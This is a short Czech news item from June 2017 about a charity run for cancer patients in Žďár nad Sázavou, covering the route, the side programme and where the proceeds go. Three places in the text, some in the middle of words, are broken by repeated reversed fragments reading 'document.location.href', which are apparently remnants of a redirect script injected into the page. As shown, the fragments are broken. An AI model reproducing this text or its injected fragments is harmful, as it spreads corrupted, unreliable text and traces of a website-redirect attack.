Rainbow page separator

Za Domem kultury lidé vyběhnou na pomoc nemocným rakovinou

Čtvrtek, 1. června 2017

Žďár nad Sázavou / Pohybem k naději se jmenuje akce, v rámci které lidé v pátek 2. června mohou přispět na boj proti rakovině. Tradiční charitativní běh, který volně navazuje na Běh Terryho Foxe, odstartuje za Domem kultury v 16 hodin, registrace začne o hodinu dříve. Výtěžek sbírky poputuje prostřednictvím nadačního Fondu Krtek Klinice dětské onkologie Fakultní nemocnice v Brně. Akci pořádá Jednota Orel s organizací Duha a učiteli z „druhé“ základní školy.
Základní trasa symbolického běhu bude stejná jako v předešlých letech, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to po cyklostezce směrem k Pilské nádrži. Účastníci akce ale nemusí jenom běžet, na startu jsou vítáni i pěší, cyklisté, koloběžkáři, in-line bruslaři, vozíčkáři či třeba maminky s kočárky. Pro běžce, kterým se trať po cyklostezce zdá příliš krátká a nenáročná, mohou zvolit terénní běh úvozem k Olšiakově soše Mamlase a zpět.
I v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce se za Domem kultury uskuteční doprovodný program – vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí žďárské hudební uskupení AMaTer a tanečníci ze skupiny Gingers, děti se mohou těšit na skákací hrad i živá zvířata. Chybět nebude ani tradiční soutěž o největší skupinu běžců, nejstaršího a nejmladšího účastníka, nejpočetnější běžící rodinu, případně účastníka z nejvzdálenější země.